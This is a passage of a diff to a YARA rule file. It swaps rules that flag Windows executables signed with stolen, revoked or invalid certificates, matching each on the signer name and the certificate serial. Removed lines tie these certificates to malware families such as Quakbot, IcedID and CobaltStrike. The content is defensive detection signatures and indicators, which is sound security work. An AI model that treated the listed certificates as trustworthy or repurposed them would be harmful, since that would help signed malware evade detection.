-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8221-L8234"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2783-L2794"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "84c3d89e8393bcaddea53326730d795f482ec65c574fde5c1c81f395178b591a"
+		logic_hash = "bdf847f95bc6cc50513b76c57c3e76bc17caacd3419baabb2cab0161feb67508"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "71382f6c6e48df51f15606380cd6948bf37f044d18566ebc2d262fc87e70b9b1"
-		reason = "Gh0stRAT"
+		thumbprint = "d1f9930521e172526a9f018471d4575d60d8ad8f"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fahad Malik" and pe.signatures [ i ] . serial == "2f:38:de:4c:ed:0b:07:09:73:b9:e9:b9:b1:dc:fa:7f" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MISTO EKONOMSKE STORITVE, d.o.o." and pe.signatures [ i ] . serial == "00:92:bc:05:1f:18:11:bb:0b:86:72:7c:36:39:4f:78:49" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_53E1F226Cb77574F8Fbeb5682Da091Bb : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_B4F42E2C153C904Fda64C957Ed7E1028 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "6967042e-156b-541d-970c-491dece12f08"
+		id = "d284b7f0-9728-5755-87d5-f8251903e778"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8236-L8249"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2796-L2807"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "41f4902e9d02254efdfd19a73de16e1128b15d264c3ed128d5ec28bd92f2d8a4"
+		logic_hash = "d47f85602234eae7629b778b09ed5c3656c6afa8b6a7ba42cc46f451202a16c0"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "d247ec7e224a24683da3f138112ffc9607f83c917d6c45494dd744d732249260"
-		reason = "SystemBC"
+		thumbprint = "ed4c50ab4f173cf46386a73226fa4dac9cadc1c4"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OdyLab Inc" and pe.signatures [ i ] . serial == "53:e1:f2:26:cb:77:57:4f:8f:be:b5:68:2d:a0:91:bb" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NONO spol. s r.o." and pe.signatures [ i ] . serial == "b4:f4:2e:2c:15:3c:90:4f:da:64:c9:57:ed:7e:10:28" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_Df2547B2Cab5689A81D61De80Eaaa3A2 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00Ac307E5257Bb814B818D3633B630326F : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "4eba17f8-df3c-552d-90b5-faef7b860203"
+		id = "b6d6c195-cd02-5ecd-82f3-348ab6f26eb5"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8251-L8264"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2809-L2820"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c32a6510bd3cfd09e84ccf36140eb405945059c981fb1888298501493f6ef68f"
+		logic_hash = "f187d3084eb189cdd0e858aed1d9589d586f369b128679c6c1dec860e544f326"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "4c6e21a6e96ea6fae6c142c2d1c919f590d9bf4e5c6b0f3ec7f9b0a38f3ce45d"
-		reason = "IcedID"
+		thumbprint = "4d6a089ec4edcac438717c1d64a8be4ef925a9c6"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FORWARD MUSIC AGENCY SRL" and pe.signatures [ i ] . serial == "df:25:47:b2:ca:b5:68:9a:81:d6:1d:e8:0e:aa:a3:a2" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Aqua Direct s.r.o." and pe.signatures [ i ] . serial == "00:ac:30:7e:52:57:bb:81:4b:81:8d:36:33:b6:30:32:6f" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_58Af00Ce542760Fc116B41Fa92E18589 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_063A7D09107Eddd8Aa1F733634C6591B : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "62fd5f76-b890-5532-8c6f-e26942584899"
+		id = "489daa61-8409-500d-bc46-a42a444fcdc0"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8266-L8279"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2822-L2833"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "bcabd77b40ad9eae4c499c8cd4b3e3d39e5478fa590be536860375e890c1b62e"
+		logic_hash = "8b6c1935d51207e6b9919c85d369dcc6963f52ee4d21758d18e2c57115e9051b"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "620dafea381ab657e0335321ca5a95077f33021927a32d5d62bff7e33704f4b7"
-		reason = "Quakbot"
+		thumbprint = "a03f9b3f3eb30ac511463b24f2e59e89ee4c6d4a"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DICKIE MUSDALE WINDFARM LIMITED" and pe.signatures [ i ] . serial == "58:af:00:ce:54:27:60:fc:11:6b:41:fa:92:e1:85:89" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Smart Line Logistics" and pe.signatures [ i ] . serial == "06:3a:7d:09:10:7e:dd:d8:aa:1f:73:36:34:c6:59:1b" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_5B1F9Ec88D185631Ab032Dbfd5166C0D : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_4C687A0022C36F89E253F91D1F6954E2 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "233466e6-7b5f-50d7-967a-976b698e9194"
+		id = "d4b03832-60f2-5342-8186-3e6c3d7eeb63"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8281-L8294"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2835-L2846"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "05428b4e636a60fb409ead0f4aeb25ed08dae24d58c98a17bb77aa521706763a"
+		logic_hash = "0bcbe8c85f02735378b5be95c098ca5088f451e390ec6ce76fb732f0db297c1f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "a46234c01e9f9904e500aefad4b5718d86aaec4e084b3d8ffbfe5724f8ddda45"
-		reason = "Quakbot"
+		thumbprint = "4412007ae212d12cea36ed56985bd762bd9fb54a"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TOPFLIGHT GROUP LIMITED" and pe.signatures [ i ] . serial == "5b:1f:9e:c8:8d:18:56:31:ab:03:2d:bf:d5:16:6c:0d" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HETCO ApS" and pe.signatures [ i ] . serial == "4c:68:7a:00:22:c3:6f:89:e2:53:f9:1d:1f:69:54:e2" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_Ff52Eb011Bb748Fee75153Cbe1E50Dd6 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_3Cee26C125B8C188F316C3Fa78D9C2F1 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "452d9f84-a950-5503-adaf-fba95b45e798"
+		id = "d9271a74-1a04-5863-afc6-4b1d2982f680"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8296-L8309"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2848-L2859"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e439f15c3312ed3a1840967bb165300a491ffe3d1c9c629abcbebf3efd9b1f50"
+		logic_hash = "673a275a6d899b5de66d80cb55fa6438c2e14c70a96ba8461eb4946e1f4b4dfa"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "c75025c80ab583a6ab87070e5b65c93cb59b48e0cbb5f99113e354a96f8fcd39"
-		reason = "Quakbot"
+		thumbprint = "9efcf68a289d9186ec17e334205cb644c2b6a147"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TASK ANNA LIMITED" and pe.signatures [ i ] . serial == "ff:52:eb:01:1b:b7:48:fe:e7:51:53:cb:e1:e5:0d:d6" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bitubit LLC" and pe.signatures [ i ] . serial == "3c:ee:26:c1:25:b8:c1:88:f3:16:c3:fa:78:d9:c2:f1" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_Eda0F47B3B38E781Cdf6Ef6Be5D3F6Ee : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_A0A27Aefd067Ac62Ce0247B72Bf33De3 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "4d845dd7-4153-5082-bff0-d5f9a7b4b46e"
+		id = "1e8db3c4-8d32-5a8d-96ac-785d8f703c7d"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8311-L8324"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2861-L2872"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7b53d30e5b6176eaae854bf4046339864225b417a147fe6f24fb51dfb0535911"
+		logic_hash = "c49e1d8b1a2d0e27fd25574ce587f60770ecac75c1db437bf7538d2ff47c8d4c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "1ef38b7c430c09062f4408c47da14d814be5e2e99749e65a2cf097f5610024fc"
-		reason = "Matanbuchus"
+		thumbprint = "42c2842fa674fdca14c9786aaec0c3078a4f1755"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ADVANCED ACCESS SERVICES LTD" and pe.signatures [ i ] . serial == "ed:a0:f4:7b:3b:38:e7:81:cd:f6:ef:6b:e5:d3:f6:ee" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cfbcdabfdbdccaaccadfeaacacf" and pe.signatures [ i ] . serial == "a0:a2:7a:ef:d0:67:ac:62:ce:02:47:b7:2b:f3:3d:e3" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_4728189Fa0F57793484Cdf764F5E283D : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_Eee8Cf0A0E4C78Faa03D07470161A90E : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "02ec531e-aa1b-50b8-ae32-d885a0185cfe"
+		id = "a91c84db-99b4-5e24-ba8a-4e009219eb05"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8326-L8339"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2874-L2885"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "181971946ee4d643430b733ed57ccf07c940205853c9e5102b08b7bc509bcc63"
+		logic_hash = "5c14eeeab8cf9797499d23f451a695b443ecc8d3ebbc2edb830ae450e444178c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "89ff94ac1c577eced3afc9a81689d30ca238a8472ad0f025f6bed57a98dbb273"
-		reason = "Quakbot"
+		thumbprint = "32eda5261359e76a4e66da1ba82db7b7a48295d2"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Power Save Systems s.r.o." and pe.signatures [ i ] . serial == "47:28:18:9f:a0:f5:77:93:48:4c:df:76:4f:5e:28:3d" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Aafabffdbdbcbfcaebdf" and pe.signatures [ i ] . serial == "ee:e8:cf:0a:0e:4c:78:fa:a0:3d:07:47:01:61:a9:0e" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_24E4A2B3Db6Be1007B9Ddc91995Bc0C8 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_79E1Cc0F6722E1A2C4647C21023Ca4Ee : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "47ca5986-3de8-56f2-a15d-ef588d8a9e03"
+		id = "0abbd882-0224-5c94-98b2-870853344883"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8341-L8354"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2887-L2898"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "71d1f8e9113170f410007b31c0d7316c537001b2a761f1e35d6bd2aa0b39f2d9"
+		logic_hash = "9d0c02ae3eab7f7c28dba04cd08fdddef2be64a1622d7fb519a4bf3a40ef19b1"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "005af6c8e9f06a2258c2df70785a5622c8d10d982fdc7f4dbe2f53af6e860359"
-		reason = "Quakbot"
+		thumbprint = "41d2f4f810a6edf42b3717cf01d4975476f63cba"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FLY BETTER s.r.o." and pe.signatures [ i ] . serial == "24:e4:a2:b3:db:6b:e1:00:7b:9d:dc:91:99:5b:c0:c8" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SPAGETTI LTD" and pe.signatures [ i ] . serial == "79:e1:cc:0f:67:22:e1:a2:c4:64:7c:21:02:3c:a4:ee" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_0772B4D1D63233D2B8771997Bc8Da5C4 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_6D688Ecf46286Fe4B6823B91384Eca86 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "a05a2bc4-a4a3-5e86-9a1c-ed82de7786df"
+		id = "4718996b-cb42-5b83-8fdf-d87751302a00"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8356-L8369"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2900-L2911"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "056fefbc03cff00a40ea9bb65893b92fcc15134c7cf7bf7dedf98f43b44bc03d"
+		logic_hash = "33296b5b9156af6d95bec9981a9fab3137bcd17bfb26ea2d212ae004275bf42e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "c6a78692f2fda8908933fb3f1df68592eb5da129caafd33329d1b804006973f7"
-		reason = "IcedID"
+		thumbprint = "970205140b48d684d0dc737c0fe127460ccfac4f"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Maya logistika d.o.o." and pe.signatures [ i ] . serial == "07:72:b4:d1:d6:32:33:d2:b8:77:19:97:bc:8d:a5:c4" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AtomPark Software JSC" and pe.signatures [ i ] . serial == "6d:68:8e:cf:46:28:6f:e4:b6:82:3b:91:38:4e:ca:86" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_1Deea179F5757Fe529043577762419Df : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_9Aa99F1B75A463460D38C4539Fae4F73 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "a6b9b9e4-0998-5f67-8c12-7628ba3a5a56"
+		id = "5ffad411-49e2-5691-95e7-1e294a2a101e"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8371-L8384"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2913-L2924"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b521363d1d38a4ed1b2b4126aec85ed6bffc23dc4e30f6f6c942e1fa96b0dd8d"
+		logic_hash = "b73c6ca2c0cd0e09f0add77c3af3c8e16f46cec29b49d4dcab5a569fed8d3d39"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "9c4e87ccd6004a70115f8e654b8cc1a80d488876ff2e4e7db598303fa41b3fef"
-		reason = "Quakbot"
+		thumbprint = "b2ea9e771631f95a927c29b044284ef4f84a2069"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SPIRIT CONSULTING s. r. o." and pe.signatures [ i ] . serial == "1d:ee:a1:79:f5:75:7f:e5:29:04:35:77:76:24:19:df" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Beaacdfaeeccbbedadcb" and pe.signatures [ i ] . serial == "9a:a9:9f:1b:75:a4:63:46:0d:38:c4:53:9f:ae:4f:73" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_061A27A3A3771Bb440Fc16Cadf2675C4 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_E414655F025399Cca4D7225D89689A04 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "ef600135-6f5d-59a9-b387-60e8eb97cbf9"
+		id = "2df4eb66-4890-540f-95e1-fb69eeb32df2"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8386-L8399"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2926-L2937"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d85b9d2b6fe4ce99670a8f51e84d63f1ec6d0341a3715eeed3e3d6a0fda93dc5"
+		logic_hash = "589ad4939d235138791a98f5d43f6a786ad14345c995ad2e073d3673fb41365a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "9ed703ba7033af5f88a5f5ef0155adc41715d3175eec836822a09a93d56e4b7f"
-		reason = "Matanbuchus"
+		thumbprint = "98643cef3dc22d0cc730be710c5a30ae25d226c1"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Westeast Tech Consulting, Corp." and pe.signatures [ i ] . serial == "06:1a:27:a3:a3:77:1b:b4:40:fc:16:ca:df:26:75:c4" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE6\\xAF\\x94\\xE5\\x90\\xBE\\xE8\\xBF\\xAA\\xE5\\x90\\xBE\\xE8\\xBF\\xAA\\xE4\\xBC\\x8A\\xE4\\xBC\\x8A\\xE8\\xBF\\xAA\\xE5\\x90\\xBE\\xE5\\x90\\xBE\\xE4\\xBC\\x8A\\xE4\\xBC\\x8A\\xE6\\x8F\\x90\\xE4\\xBC\\x8A\\xE6\\xAF\\x94\\xE6\\x8F\\x90\\xE8\\xBF\\xAA\\xE8\\xBF\\xAA\\xE4\\xBC\\x8A\\xE4\\xBC\\x8A\\xE4\\xBC\\x8A\\xE6\\x8F\\x90\\xE7\\xBB\\xB4\\xE6\\xAF\\x94" and pe.signatures [ i ] . serial == "e4:14:65:5f:02:53:99:cc:a4:d7:22:5d:89:68:9a:04" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_06675181E7B5E1030B3D40926E2A47D3 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_64F82Ed8A90F92A940Be2Bb90Fbf6F48 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "2452580b-bbe8-5d54-888e-6f8fffb055cf"
+		id = "70469507-30f1-56be-90bb-1055f7df2496"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8401-L8414"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2939-L2950"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "14d963fd03187afb7afabc208e36d8bb45ec818b27782a6c3037229f82bf22d6"
+		logic_hash = "eacb9d8834bdf618b5aa44bfb37b0b6413f9b4595b6261a948566a63e9855162"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "b617253b3695fd498d645bd8278d1bdae2bc36bd4da713c6938e3fe6b0cdb9a4"
-		reason = "NetWire"
+		thumbprint = "4d00f5112caf80615852ffe1f4ee72277ed781c3"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ORANGE VIEW LIMITED" and pe.signatures [ i ] . serial == "06:67:51:81:e7:b5:e1:03:0b:3d:40:92:6e:2a:47:d3" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Klimate Vision Plus" and pe.signatures [ i ] . serial == "64:f8:2e:d8:a9:0f:92:a9:40:be:2b:b9:0f:bf:6f:48" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_Dbc03Ca7E6Ae6Db6 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00F0031491B673Ecdf533D4Ebe4B54697F : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "801bc9fc-0bd6-5c46-8c45-8cb06cfc4309"
+		id = "ad027dc9-14bc-50dd-b260-7672c528ef9a"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8416-L8429"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2952-L2963"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7d188663b00870e98984b4be4c72b0fd183b5fb8dd61512c1d65d386f1ebad0a"
+		logic_hash = "4697ce0a7fcd1fa6ac1dd5246f2a23b85865bef4010280c4ca2e12c433b8ceb2"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "e059776cb5e640569a06c2548e87af5bd655f5d4815b8f6e9482835455930987"
-		reason = "CobaltStrike"
+		thumbprint = "01e201cce1024237978baccf5b124261aa5edb01"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SPIDER DEVELOPMENTS PTY LTD" and pe.signatures [ i ] . serial == "db:c0:3c:a7:e6:ae:6d:b6" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Eebbffbceacddbfaeefaecdbaf" and pe.signatures [ i ] . serial == "00:f0:03:14:91:b6:73:ec:df:53:3d:4e:be:4b:54:69:7f" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_26F855A25890B749578F13E4B9459768 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_Becd4Ef55Ced54E5Bcde595D872Ae7Eb : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "2953afc3-6a46-5126-8f82-52f8dc1f89d6"
